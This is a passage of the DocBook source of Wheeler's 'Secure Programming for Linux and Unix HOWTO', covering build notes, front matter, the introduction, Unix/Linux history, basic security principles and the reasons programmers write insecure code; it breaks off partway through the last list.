LDP/LDP/howto/docbook/Secure-Programs-HOWTO/Secure-Programs-HOWTO.sgml

<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook V4.1//EN">

<!-- "Secure Programming for Linux and Unix HOWTO",
     Copyright (C) 1999-2003 David A. Wheeler
     http://www.dwheeler.com/secure-programs  -->

<!-- WARNING!!! This book is MUCH LARGER than the tiny little HOWTO's
     that you may be used to, and I've found that you have to
     reconfigure certain tools and use some tools carefully
     for this book to be produced properly.

     TeX's default save-size is TOO SMALL to print this large book.
     You need to modify the Tex configuration file "texmf.cnf"; this is in
     "/usr/share/texmf/web2c" on Red Hat Linux 7.1, and in "/etc" on some
     other systems.  Change the entry saying:
        save_size.pdfjadetex = 5000
     to a larger size, say:
        save_size.pdfjadetex = 30000

     Also, for printing you need to change the style slightly using the
     "-d" option, such as:
       db2ps -d dwheeler-book-style.dsl Secure-Programs-HOWTO.sgml
     Otherwise, the URLs run right off the right-hand side of the page
     in the printed versions and it's really awful.

     When generating the PDF, generate the Postscript and then
     translate that to PDF.  That has its disadvantages, but the
     "db2pdf" can't handle figures properly (the TeX intermediate stage
     can't handle .eps, and DocBook won't let you insert .pdf).
     Ideally mediaobject would be more flexible than this..!

     This is a book, so it should follow book conventions.  This means
     the first pages should be numbered with roman numerals
     (the first page of chapter 1 becomes page 1), and that chapters always
     begin on the right-hand side (odd numbered pages).  Currently, the
     Docbook tools don't do this - UGH!  However, there are patches to do it -
     http://www.mail-archive.com/docbook-apps@lists.oasis-open.org/msg02364.html
     (Re: DOCBOOK-APPS: preface page numbering)
     From: camille
     Subject: Re: DOCBOOK-APPS: preface page numbering
     Date: Fri, 24 Aug 2001 00:41:15 -0700
     Mentions this - apply twosidestartonright.patch.bz2 and features.patch.bz2
     (had to change the %top-margin% when using the patched openjade).
     The "features" patch (Francis J. Lacoste's) must be applied first.
-->


<!-- This is a sample comment.
     This book has had more titles than I'd like to think about. It was
     originally titled "How to Write Secure Programs for Linux", then
     "Design and Implementation Guidelines for Secure Linux Applications".
     I first released it widely as the
     "Secure Programming for Linux HOWTO", and then it morphed into the
     "Secure Programming for Linux and Unix HOWTO".

     You can get the latest version of this book from:
     http://www.dwheeler.com/secure-programs/

     Note that this is the DocBook DTD version!
     To process it, get DocBook tools. If you are using Cygnus's tools, do this:
       db2html Secure*.sgml
       db2ps   Secure*.sgml

    Earlier versions through version 1.60 used the Linuxdoc DTD;
    Version 2.00 has the same content as 1.60, but in DocBook format.
    While the book is now legal DocBook content, it's not "fully"
    marked-up; suggestions on missing markings welcome.


-->

<!--
??? Need to add material from Oliver Friedrichs <of@securityfocus.com>
http://www.securityfocus.com/forums/secprog/secure-programming.html
backup copy at:
http://www.cli.di.unipi.it/~zoppi/docs/secprog.html
now cached at:
http://www.google.com/search?q=cache:DpVgMo24NZQ:www.securityfocus.com/forum
s/secprog/secure-programming.html+%22Oliver+Friedrichs%22+%22secure+programm
ing%22&hl=en
especially code examples.  This will add Windows-related material, so
I'll change the title to be more inclusive and add summary materials about
Windows' security approaches.  This will involve a modification of many
areas, since most of the text assumes a Unix-like only viewpoint.

??? Should look at Razvan Peteanu <razvan.peteanu@home.com>'s material at
http://members.home.net/razvan.peteanu/Best%20Practices%20for%20Secure%20Web
%20Development%203.0.pdf
to see if I've missed anything.

??? Examine other material:
LSAP FAQ http://lsap.org/faq.txt
http://www.w3.org/Security/Faq/www-security-faq.html
http://security.devx.com/ See Best Defense Tab & more defense articles.
http://members.home.net/razvan.peteanu/
http://www.shmoo.com/securecode/
http://www.securityfocus.com/frames/?content=/forums/secprog/intro.html  A listserve on the subject.
http://heap.nologin.net/aspsec.html
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog1.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog2.html
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog3.html
and so on till
http://portal.suse.de/en/content.php?3occccccccccccccccccccmccccccccacocccccccococcccccccccccccccc&content/security/secprog8.html
Good developer oriented resources:
http://www-106.ibm.com/developerworks/security/
http://www.boran.com/security/it13-applications.html

Some code review sites:
http://www.homeport.org/~adam/review.html
http://www.mozilla.org/hacking/reviewers.html
http://www.dnaco.net/~kragen/security-holes.html

I have other links at http://heap.nologin.net/programming.html which may be
of interest, but those seemed most relevant.


For general statistics on computer crime, see the FBI/CSI
"Computer Crime and Security Survey", e.g.,
http://www.gocsi.com/press/20020407.html


-->


<book>

<bookinfo>

<!-- bookbiblio -->

<title>Secure Programming for Linux and Unix HOWTO</title>
<author>
<firstname>David</firstname> <othername role="mi">A.</othername><surname>Wheeler</surname>
</author>
<address><email>dwheeler@dwheeler.com</email></address>
<pubdate>v3.010, 3 March 2003</pubdate>
<edition>v3.010</edition>
<!-- FYI: The LDP claims they don't use the "edition" tag.  -->
<copyright>
 <year>1999</year>
 <year>2000</year>
 <year>2001</year>
 <year>2002</year>
 <year>2003</year>
 <holder>David A. Wheeler</holder>
</copyright>

<legalnotice>
<para>
This book is Copyright (C) 1999-2003 David A. Wheeler.
Permission is granted to copy, distribute and/or modify
this book under the terms of the GNU Free Documentation License (GFDL),
Version 1.1 or any later version published by the Free Software Foundation;
with the invariant sections being ``About the Author'',
with no Front-Cover Texts, and no Back-Cover texts.
A copy of the license is included in the section entitled
"GNU Free Documentation License".
This book is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</para>
</legalnotice>

<abstract>
<para>
This book provides a set of design and implementation
guidelines for writing secure programs for Linux and Unix systems.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
Specific guidelines for C, C++, Java, Perl, PHP, Python, Tcl,
and Ada95 are included.
For a current version of the book, see
<ulink url="http://www.dwheeler.com/secure-programs">
http://www.dwheeler.com/secure-programs</ulink>
</para>
</abstract>

<!-- /bookbiblio -->
<keywordset>
  <keyword>secure programming</keyword>
  <keyword>secure programs</keyword>
  <keyword>secure applications</keyword>
  <keyword>secure</keyword>
  <keyword>programming</keyword>
  <keyword>security</keyword>
  <keyword>Linux</keyword>
  <keyword>Unix</keyword>
  <keyword>hack</keyword>
  <keyword>crack</keyword>
  <keyword>vulnerability</keyword>
  <keyword>buffer overflow</keyword>
  <keyword>design</keyword>
  <keyword>implementation</keyword>
  <keyword>web application</keyword>
  <keyword>web applications</keyword>
  <keyword>CGI</keyword>
  <keyword>setuid</keyword>
  <keyword>setgid</keyword>
  <keyword>C</keyword>
  <keyword>C++</keyword>
  <keyword>Java</keyword>
  <keyword>Perl</keyword>
  <keyword>PHP</keyword>
  <keyword>Python</keyword>
  <keyword>Tcl</keyword>
  <keyword>Ada</keyword>
  <keyword>Ada95</keyword>
</keywordset>

</bookinfo>

<!-- Begin the book -->


<chapter id="introduction">
<title>Introduction</title>

<epigraph>
<attribution>Proverbs 21:22 (NIV)</attribution>
<para>
A wise man attacks the city of the mighty
and pulls down the stronghold in which they trust.
</para>
</epigraph>

<para>
This book describes a set of guidelines for
writing secure programs on Linux and Unix systems.
For purposes of this book, a ``secure program'' is a program
that sits on a security boundary, taking input from a source that does
not have the same access rights as the program.
Such programs include application programs used as viewers of remote data,
web applications (including CGI scripts),
network servers, and setuid/setgid programs.
This book does not address modifying the operating system kernel itself,
although many of the principles discussed here do apply.
These guidelines were developed as a survey of
``lessons learned'' from various sources on how to create such programs
(along with additional observations by the author),
reorganized into a set of larger principles.
This book includes specific guidance for a number of languages,
including C, C++, Java, Perl, PHP, Python, Tcl, and Ada95.
</para>

<para>
You can find the master copy of this book at
<ulink url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>.
This book is also part of the Linux Documentation Project (LDP) at
<ulink
url="http://www.tldp.org">http://www.tldp.org</ulink>
It's also mirrored in several other places.
Please note that these mirrors, including the LDP copy and/or the
copy in your distribution, may be older than the master copy.
I'd like to hear comments on this book, but please do not send comments
until you've checked to make sure that your comment is valid for the
latest version.
</para>

<para>
This book does not cover assurance measures, software engineering
processes, and quality assurance approaches,
which are important but widely discussed elsewhere.
Such measures include testing, peer review,
configuration management, and formal methods.
Documents specifically identifying sets of development
assurance measures for security issues include
the Common Criteria (CC, [CC 1999]) and the
Systems Security Engineering Capability Maturity Model [SSE-CMM 1999].
Inspections and other peer review techniques are discussed in
[Wheeler 1996].
This book does briefly discuss ideas from the CC, but only as an organizational
aid to discuss security requirements.
More general sets of software engineering processes
are defined in documents such as the
Software Engineering Institute's Capability Maturity Model for Software
(SW-CMM) [Paulk 1993a, 1993b]
and ISO 12207 [ISO 12207].
General international standards for quality systems are defined in
ISO 9000 and ISO 9001 [ISO 9000, 9001].


<!--
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
Note that ISO 9001-3 is obsolete.
-->
<!-- ??? Ideally have references for these. -->
</para>

<para>
This book does not discuss how to configure a system (or network)
to be secure in a given environment. This is clearly necessary for
secure use of a given program,
but a great many other documents discuss secure configurations.
An excellent general book on configuring Unix-like systems to be
secure is Garfinkel [1996].
Other books for securing Unix-like systems include Anonymous [1998].
You can also find information on configuring Unix-like systems at web sites
such as
<ulink url="http://www.unixtools.com/security.html">http://www.unixtools.com/security.html</ulink>.
Information on configuring a Linux system to be secure is available in a
wide variety of documents including
Fenzi [1999], Seifried [1999], Wreski [1998], Swan [2001],
and Anonymous [1999].
Geodsoft [2001] describes how to harden OpenBSD,
and many of its suggestions are useful for any Unix-like system.
Information on auditing existing Unix-like systems are discussed in
Mookhey [2002].
For Linux systems (and eventually other Unix-like systems),
you may want to examine the Bastille Hardening System, which
attempts to ``harden'' or ``tighten'' the Linux operating system.
You can learn more about Bastille at
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>;
it is available for free under the General Public License (GPL).
Other hardening systems include
<ulink url="http://www.grsecurity.net">grsecurity</ulink>.
For Windows 2000, you might want to look at
Cox [2000].
The U.S. National Security Agency (NSA) maintains a set of
security recommendation guides at
<ulink url="http://nsa1.www.conxion.com">http://nsa1.www.conxion.com</ulink>,
including the ``60 Minute Network Security Guide.''
If you're trying to establish a public key infrastructure (PKI) using
open source tools, you might want to look at the
<ulink url="http://ospkibook.sourceforge.net">
Open Source PKI Book.
</ulink>
More about firewalls and Internet security is found in
[Cheswick 1994].
</para>

<para>
Configuring a computer is only part of Security Management, a larger
area that also covers how to deal with viruses, what kind of
organizational security policy is needed, business continuity plans, and
so on.
There are international standards and guidance for security management.
ISO 13335 is a five-part
technical report giving guidance on security management [ISO 13335].
ISO/IEC 17799:2000 defines a code of practice [ISO 17799];
its stated purpose is to give high-level and general
``recommendations for information security management
for use by those who are responsible for initiating, implementing or
maintaining security in their organization.''
The document specifically identifies itself as
"a starting point for developing organization specific guidance."
It also states that not all of the guidance and controls it contains may be
applicable, and that additional controls not contained may be required.
Even more importantly, they are intended to be
broad guidelines covering a number of areas.
and not intended to give definitive details or "how-tos".
It's worth noting that the original
signing of ISO/IEC 17799:2000 was controversial;
Belgium, Canada, France, Germany, Italy, Japan and the US
voted <emphasis>against</emphasis> its adoption.
However, it appears that these votes were primarily a protest on
parliamentary procedure, not on the content of the document,
and certainly people are welcome to use ISO 17799 if they find it helpful.
More information about ISO 17799 can be found in NIST's
<ulink url="http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf">
ISO/IEC 17799:2000 FAQ</ulink>.
ISO 17799 is highly related to BS 7799 part 1 and 2;
more information about BS 7799 can be found at
<ulink url="http://www.xisec.com/faq.htm">http://www.xisec.com/faq.htm</ulink>.
ISO 17799 is currently under revision.
It's important to note that none of these standards
(ISO 13335, ISO 17799, or BS 7799 parts 1 and 2)
are intended to be a detailed set of technical guidelines for software
developers;
they are all intended to provide broad guidelines in a number of areas.
This is important, because software developers who
simply only follow (for example) ISO 17799 will
generally <emphasis>not</emphasis> produce
secure software - developers need much, much, much
more detail than ISO 17799 provides.
</para>

<para>
The Commonly Accepted Security Practices & Recommendations (CASPR)
project at
<ulink url="http://www.caspr.org">http://www.caspr.org</ulink>
is trying to distill information security knowledge into a series of
papers available to all (under the GNU FDL license, so that future
document derivatives will continue to be available to all).
Clearly, security management needs to include keeping with patches
as vulnerabilities are found and fixed.
Beattie [2002] provides an
interesting analysis on how to determine when to apply patches
contrasting risk of a bad patch to the risk of intrusion
(e.g., under certain conditions, patches are optimally
applied 10 or 30 days after they are released).
</para>

<para>
If you're interested in the current state of vulnerabilities, there are
other resources available to use.
The CVE at http://cve.mitre.org gives a standard identifier for each
(widespread) vulnerability.
The paper
<ulink url="http://securitytracker.com/learn/securitytracker-stats-2002.pdf">
SecurityTracker Statistics</ulink>
analyzes vulnerabilities to determine what were the
most common vulnerabilities.
The Internet Storm Center at http://isc.incidents.org/
shows the prominence of various Internet attacks around the world.
</para>

<para>
This book assumes that the reader understands computer
security issues in general, the general security model of Unix-like systems,
networking (in particular TCP/IP based networks),
and the C programming language.
This book does include some information about the Linux and Unix
programming model for security.
If you need more information on how TCP/IP based networks and protocols
work, including their security protocols, consult general works on
TCP/IP such as [Murhammer 1998].
</para>

<para>
When I first began writing this document, there were many short articles
but no books on writing secure programs.
There are now two other books on writing secure programs.
One is ``Building Secure Software'' by John Viega and Gary McGraw [Viega 2002];
this is a very good book that discusses a number of important security issues,
but it omits a large number of important security problems that are
instead covered here.
Basically, this book selects several important topics and covers them
well, but at the cost of omitting many other important topics.
The Viega book has a little more information for Unix-like systems than for
Windows systems, but much of it is independent of the kind of system.
The other book is ``Writing Secure Code'' by Michael Howard and David LeBlanc
[Howard 2002].
The title of this other book is misleading;
the book is solely about writing secure programs for Windows,
and is basically worthless if you are writing programs for any other system.
This shouldn't be surprising; it's published by Microsoft press, and its
copyright is owned by Microsoft.
If you are trying to write secure programs for Microsoft's
Windows systems, it's a good book.
Another useful source of secure programming guidance is the
<ulink url="http://www.owasp.org/guide">
The Open Web Application Security Project (OWASP)
Guide to Building Secure Web Applications and Web Services</ulink>;
it has more on process, and less specifics than this book, but it
has useful material in it.
</para>

<para>
This book covers all Unix-like systems, including Linux and the
various strains of Unix, and it particularly stresses Linux and provides
details about Linux specifically.
There's some material specifically on Windows CE, and in fact much of
this material is not limited to a particular operating system.
If you know relevant information not already included here, please let
me know.
</para>

<para>
This book is copyright (C) 1999-2002 David A. Wheeler and is covered by the
GNU Free Documentation License (GFDL);
see <xref linkend="about-license"> and
<xref linkend="fdl"> for more information.
</para>

<para>
<xref linkend="background">
discusses the background of Unix, Linux, and security.
<xref linkend="features">
describes the general Unix and Linux security model,
giving an overview of the security attributes and operations of
processes, filesystem objects, and so on.
This is followed by the meat of this book, a set of design and implementation
guidelines for developing applications on Linux and Unix systems.
The book ends with conclusions in
<xref linkend="conclusion">,
followed by a lengthy bibliography and appendixes.
</para>

<!-- ???: Reference other taxonomies, such as Bisbey's at
     http://seclab.cs.ucdavis.edu/projects/history/papers/bisb78.pdf
     and see if I should (partially) switch to one of them.
-->
<para>
The design and implementation guidelines are divided into
categories which I believe emphasize the programmer's viewpoint.
Programs accept inputs, process data, call out to other resources,
and produce output, as shown in <xref linkend="abstract-program">;
notionally all security guidelines fit into one of these categories.
I've subdivided ``process data'' into
structuring program internals and approach,
avoiding buffer overflows (which in some cases can also be considered
an input issue),
language-specific information, and special topics.
The chapters are ordered to make the material easier to follow.
Thus, the book chapters giving guidelines discuss
validating all input (<xref linkend="input">),
avoiding buffer overflows (<xref linkend="buffer-overflow">),
structuring program internals and approach (<xref linkend="internals">),
carefully calling out to other resources (<xref linkend="call-out">),
judiciously sending information back (<xref linkend="output">),
language-specific information (<xref linkend="language-specific">),
and finally information on special topics such as how to acquire random
numbers (<xref linkend="special">).
</para>

<figure float="1" id="abstract-program">
    <title>Abstract View of a Program</title>
    <mediaobject>
       <imageobject>
          <imagedata scalefit="1" scale="50" fileref="images/program.eps" format="eps">
       </imageobject>
       <imageobject>
          <imagedata fileref="images/program.png" format="png">
       </imageobject>
       <textobject>
          <phrase>
A program accepts inputs, processes data,
possibly calls out to other programs, and produces output.
          </phrase>
       </textobject>
    </mediaobject>
</figure>

</chapter>

<chapter id="background">
<title>Background</title>

<epigraph>
<attribution>Ezra 4:19 (NIV)</attribution>
<para>
I issued an order and a search was made, and it was found that this
city has a long history of revolt against kings and has been
a place of rebellion and sedition.
</para>
</epigraph>

<sect1 id="history">
<title>History of Unix, Linux, and Open Source / Free Software</title>

<sect2 id="unix-history">
<title>Unix</title>

<para>
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at
AT&amp;T Bell Labs began developing
a small operating system on a little-used PDP-7.
The operating system was soon christened Unix, a pun on an earlier operating
system project called MULTICS.
In 1972-1973 the system was rewritten in the programming language C,
an unusual step that was visionary: due to this decision, Unix was
the first widely-used operating system that
could switch from and outlive its original hardware.
Other innovations were added to Unix as well, in part due to synergies
between Bell Labs and the academic community.
In 1979, the ``seventh edition'' (V7) version
of Unix was released, the grandfather of all extant Unix systems.
</para>

<para>
After this point, the history of Unix becomes somewhat convoluted.
The academic community, led by Berkeley, developed a variant called the
Berkeley Software Distribution (BSD), while AT&amp;T continued developing
Unix under the names ``System III'' and later ``System V''.
In the late 1980's through early 1990's
the ``wars'' between these two major strains raged.
After many years each variant adopted many of the key features of the other.
Commercially, System V won the ``standards wars'' (getting most of its
interfaces into the formal standards), and
most hardware vendors switched to AT&amp;T's System V.
However, System V ended up incorporating many BSD innovations, so the
resulting system was more a merger of the two branches.
The BSD branch did not die, but instead became widely used
for research, for PC hardware, and for
single-purpose servers (e.g., many web sites use a BSD derivative).
</para>

<para>
The result was many different versions of Unix,
all based on the original seventh edition.
Most versions of Unix were proprietary and maintained by their respective
hardware vendor, for example, Sun Solaris is a variant of System V.
Three versions of the BSD branch of Unix ended up as open source:
FreeBSD (concentrating on ease-of-installation for PC-type hardware),
NetBSD (concentrating on many different CPU architectures), and
a variant of NetBSD, OpenBSD (concentrating on security).
More general information about Unix history can be found at
<ulink
url="http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm">http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm</ulink>,
<ulink
url="http://perso.wanadoo.fr/levenez/unix">http://perso.wanadoo.fr/levenez/unix</ulink>, and
<ulink url="http://www.crackmonkey.org/unix.html">
http://www.crackmonkey.org/unix.html
</ulink>.
Much more information about the BSD history can be found in
[McKusick 1999] and
<ulink
url="ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree">ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/share/misc/bsd-family-tree</ulink>.
</para>

<para>
A slightly old but interesting advocacy piece that presents arguments
for using Unix-like systems (instead of Microsoft's products) is
<ulink
url="http://web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch">
John Kirch's paper ``Microsoft Windows NT Server 4.0 versus UNIX''
</ulink>.
<!-- Note that researchers prefer Unix-like systems, not Windows; see
     http://www.dyncorp-is.com/darpa/meetings/win98aug/wars.html -->
</para>

</sect2>

<sect2 id="fsf-history">
<title>Free Software Foundation</title>

<para>
In 1984 Richard Stallman's Free Software Foundation (FSF) began the GNU
project, a project to create a free version of the Unix operating system.
By free, Stallman meant software that could be freely
used, read, modified, and redistributed.
The FSF successfully built a vast number of
useful components, including a C compiler (gcc), an
impressive text editor (emacs), and a host of fundamental tools.
However, in the 1990's the FSF
was having trouble developing the operating system kernel [FSF 1998];
without a kernel their dream of a completely free operating system
would not be realized.
</para>

</sect2>

<sect2 id="linux-history">
<title>Linux</title>

<para>
In 1991 Linus Torvalds began developing an operating system kernel, which
he named ``Linux'' [Torvalds 1999].
This kernel could be combined with the FSF material and other components
(in particular some of the BSD components and MIT's X-windows software) to
produce a freely-modifiable and very useful operating system.
This book will term the kernel itself the ``Linux kernel'' and
an entire combination as ``Linux''.
Note that many use the term ``GNU/Linux'' instead for this combination.
</para>

<para>
In the Linux community,
different organizations have combined the available components differently.
Each combination is called a ``distribution'', and the organizations that
develop distributions are called ``distributors''.
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel,
and Debian.
There are differences between the various distributions,
but all distributions are based on the same foundation: the
Linux kernel and the GNU glibc libraries.
Since both are covered by ``copyleft'' style licenses, changes to
these foundations generally must be made available to all, a
unifying force between the Linux distributions at their foundation
that does not exist between the BSD and AT&amp;T-derived Unix systems.
This book is not specific to any Linux distribution; when it
discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater,
valid assumptions for essentially all current major
Linux distributions.
</para>

</sect2>

<sect2 id="oss-history">
<title>Open Source / Free Software</title>

<para>
Increased interest in software that is freely shared
has made it increasingly necessary to define and explain it.
A widely used term is ``open source software'', which is further defined in
[OSI 1999].
Eric Raymond [1997, 1998] wrote several seminal articles examining
its various development processes.
Another widely-used term is ``free software'', where the ``free''
is short for ``freedom'': the usual explanation is ``free speech, not
free beer.''
Neither phrase is perfect.
The term
``free software'' is often confused with programs whose executables are
given away at no charge, but whose source code cannot be viewed, modified,
or redistributed.
Conversely, the term ``open source'' is sometime (ab)used
to mean software whose
source code is visible, but for which there are limitations on
use, modification, or redistribution.
This book uses the term ``open source'' for its usual meaning, that
is, software which has its source code freely available for
use, viewing, modification, and redistribution; a more detailed
definition is contained in the
<ulink
url="http://www.opensource.org/osd.html">Open Source Definition</ulink>.
In some cases, a difference in motive is suggested;
those preferring the term ``free software'' wish to strongly
emphasize the need for freedom, while those using the term may have
other motives (e.g., higher reliability) or simply wish to appear less
strident.
For information on this definition of free software, and
the motivations behind it, can be found at
<ulink url="http://www.fsf.org">http://www.fsf.org</ulink>.
</para>

<para>
Those interested in reading advocacy pieces for open source software
and free software should see
<ulink
url="http://www.opensource.org">http://www.opensource.org</ulink> and
<ulink
url="http://www.fsf.org">http://www.fsf.org</ulink>.
There are other documents which examine such software, for example,
Miller [1995]
found that the open source software were noticeably
more reliable than proprietary software
(using their measurement technique, which measured
resistance to crashing due to random input).
</para>

</sect2>

<sect2 id="linux-vs-unix">
<title>Comparing Linux and Unix</title>

<para>
This book uses the term ``Unix-like'' to describe
systems intentionally like Unix.
In particular, the term ``Unix-like'' includes
all major Unix variants and Linux distributions.
Note that many people simply use the term ``Unix'' to describe these systems
instead.
Originally, the term ``Unix'' meant a particular product developed
by AT&amp;T.
Today, the Open Group owns the Unix trademark, and it defines Unix as
``the worldwide Single UNIX Specification''.
<!-- http://www.unix-systems.org/what_is_unix.html -->
</para>

<para>
Linux is not derived from Unix source code, but its interfaces are
intentionally like Unix.
Therefore, Unix lessons learned generally apply to both, including information
on security.
Most of the information in this book applies to any Unix-like system.
Linux-specific information has been intentionally added to
enable those using Linux to take advantage of Linux's capabilities.
</para>

<para>
Unix-like systems share a number of security mechanisms, though there
are subtle differences and not all systems have all mechanisms available.
All include user and group ids (uids and gids) for each process and
a filesystem with read, write, and execute permissions (for user, group, and
other).
<!-- ???: Most include System V single-machine
     inter-process communication (IPC) mechanisms
      and BSD's socket-based IPC (which support networks). -->
See Thompson [1974] and Bach [1986]
for general information on Unix systems, including their basic
security mechanisms.
<xref linkend="features">
summarizes key security features of Unix and Linux.
</para>

</sect2>

</sect1>

<sect1 id="security-principles">
<title>Security Principles</title>

<para>
There are many general security principles which you should be
familiar with; one good place for general information on information security
is the Information Assurance Technical Framework (IATF) [NSA 2000].
NIST has identified high-level ``generally accepted principles and practices''
[Swanson 1996].
You could also look at a general textbook on computer security, such as
[Pfleeger 1997].
NIST Special Publication 800-27 describes a number of good engineering
principles (although, since they're abstract, they're insufficient for
actually building secure programs - hence this book);
you can get a copy at
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf">
http://csrc.nist.gov/publications/nistpubs/800-27/sp800-27.pdf</ulink>.
A few security principles are summarized here.
</para>

<para>
Often computer security objectives (or goals) are described in terms of three
overall objectives:

<itemizedlist>
<listitem>

<para>
<emphasis remap="it">Confidentiality</emphasis> (also known as secrecy), meaning that the
computing system's assets can be read only by authorized parties.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Integrity</emphasis>, meaning that the assets can only be modified or deleted by
authorized parties in authorized ways.
</para>
</listitem>
<listitem>

<para>
<emphasis remap="it">Availability</emphasis>,
meaning that the assets are accessible to the authorized
parties in a timely manner (as determined by the systems requirements).
The failure to meet this goal is called a denial of service.
</para>
</listitem>

</itemizedlist>


Some people define additional major security objectives, while others lump
those additional goals as special cases of these three.
For example, some separately
identify non-repudiation as an objective; this is
the ability to ``prove'' that a sender sent or receiver received a message
(or both), even if the sender or receiver wishes to deny it later.
Privacy is sometimes addressed separately from confidentiality;
some define this as protecting the confidentiality of a
<emphasis>user</emphasis> (e.g., their identity) instead of the data.
Most objectives require identification and authentication, which is
sometimes listed as a separate objective.
Often auditing (also called accountability) is identified
as a desirable security objective.
Sometimes ``access control''  and ``authenticity'' are listed separately
as well.
For example,
The U.S. Department of Defense (DoD), in DoD directive 3600.1
<!-- (both December 9, 1996 and October 2001) -->
defines ``information assurance'' as
``information operations (IO) that protect and defend
information and information systems by ensuring
their availability, integrity, authentication,
confidentiality, and nonrepudiation.
This includes providing for restoration of information systems by
incorporating protection, detection, and reaction capabilities.''
</para>


<!--
It defines ``information operations'' as
``actions taken to affect adversary information, information systems
and decision making, while defending one's own information, information
systems and decision making.''

This is also stated in the
National Security Telecommunications and Information Systems Security Committee
(later renamed to the Committee on National Security Systems)
released the
<ulink url="http://www.nstissc.gov/Assets/pdf/4009.pdf">
``National Information Systems Security (INFOSEC) Glossary''</ulink>
(NSTISSI No. 4009), Sept 2000.

The Industry Advisory Council's Information Assurance (IA)
Special Interest Group (SIG), in their
<ulink url="http://www.iaconline.org/sig_infoassure.html">
Information Assurance Glossary</ulink>, defines information assurance as
``Conducting those operations that protect and defend
information and information systems by ensuring
availability, integrity, authentication, confidentiality,
and non-repudiation.  This includes providing for restoration
of information systems by incorporating protection,
detection and reaction capabilities.''
The U.S. Air Force's AFI 33-204 uses a similar definition for IA;
http://web1.deskbook.osd.mil/htmlfiles/rlframe/REFLIB_Frame.asp?TOC=/htmlfiles/TOC/330fktoc.asp?sNode=R&Exp=N&Doc=/reflib/maf/330fk/330fkdoc.htm&BMK=T2
it defines Information Assurance (IA)
as ``Information operations that protect and defend information
and information systems by ensuring their availability, integrity,
authentication, confidentiality, and nonrepudiation.
This includes providing for restoration of information systems
by incorporating protection, detection, and reaction capabilities.''
-->
<para>
In any case, it is important to identify your program's overall
security objectives, no matter how you group them together,
so that you'll know when you've met them.
</para>

<!-- ???: Reference other classics? Orange Book? CC? See
  http://seclab.cs.ucdavis.edu/projects/history/seminal.html

 Reference other Computer security websites and issues, including:
    http://www.centralwebs.co.uk/Links/secure.html
 Maximum Security's appendix:
    http://www.uzsci.net/documentation/Books/Max_Security/apa/apa.htm

 Multi-player games -
   How to Hurt the Hackers: The Scoop on Internet Cheating
    and How You Can Combat It
   By Matt Pritchard
   Gamasutra
   July 24, 2000
   http://www.gamasutra.com/features/20000724/pritchard_pfv.htm
 -->

<para>
Sometimes these objectives are a response to a known set of threats,
and sometimes some of these objectives are required by law.
For example, for U.S. banks and other financial institutions,
there's a new privacy law called the ``Gramm-Leach-Bliley'' (GLB) Act.
This law mandates disclosure of personal information shared and
means of securing that data, requires disclosure of personal information
that will be shared with third parties, and directs institutions to
give customers a chance to opt out of data sharing.
[Jones 2000]
</para>

<para>
There is sometimes conflict between security and some other general
system/software engineering principles.
Security can sometimes interfere with ``ease of use'', for example,
installing a secure configuration may take more effort than a
``trivial'' installation that works but is insecure.
Often, this apparent conflict can be resolved, for example, by re-thinking
a problem it's often possible to make a secure system also easy to use.
There's also sometimes a conflict between security and abstraction
(information hiding);
for example, some high-level library routines may be implemented securely
or not, but their specifications won't tell you.
In the end, if your application must be secure, you must do things yourself
if you can't be sure otherwise - yes, the library should be fixed, but
it's your users who will be hurt by your poor choice of library routines.
</para>

<para>
A good general security principle is ``defense in depth'';
you should have numerous defense mechanisms (``layers'') in place,
designed so that an attacker has to defeat multiple mechanisms to
perform a successful attack.
</para>

</sect1>

<sect1 id="why-write-insecure">
<title>Why do Programmers Write Insecure Code?</title>
<para>
Many programmers don't intend to write insecure code - but do anyway.
Here are a number of purported reasons for this.
Most of these were collected and summarized by Aleph One on Bugtraq
(in a posting on December 17, 1998):
<!-- Title: Re: Learning security [SUMMARY] -->
<itemizedlist>
<listitem><para>
There is no curriculum that addresses computer security in most schools.
Even when there <emphasis>is</emphasis> a computer security curriculum, they
often don't discuss how to write secure programs as a whole.
Many such curriculum only study certain areas such as
cryptography or protocols.
These are important, but they often fail to discuss common real-world issues
such as buffer overflows, string formatting, and input checking.
I believe this is one of the most important problems; even those programmers
who go through colleges and universities are very unlikely to learn
how to write secure programs, yet we depend on those very people to
write secure programs.
</para></listitem>
<listitem><para>
Programming books/classes do not teach secure/safe programming techniques.
Indeed, until recently there were no books on how to write secure programs
at all (this book is one of those few).
</para></listitem>
<listitem><para>
No one uses formal verification methods.
</para></listitem>
<listitem><para>
C is an unsafe language, and the standard C library string functions
are unsafe.
This is particularly important because C is so widely used -
the ``simple'' ways of using C permit dangerous exploits.
</para></listitem>
<listitem><para>
Programmers do not think ``multi-user.''
</para></listitem>
<listitem><para>
Programmers are human, and humans are lazy.
Thus, programmers will often use the ``easy'' approach instead of a
secure approach - and once it works, they often fail to fix it later.
</para></listitem>
<listitem><para>
Most programmers are simply not good programmers.
</para></listitem>
<listitem><para>
Most programmers are not security people; they simply don't often
think like an attacker does.
</para></listitem>
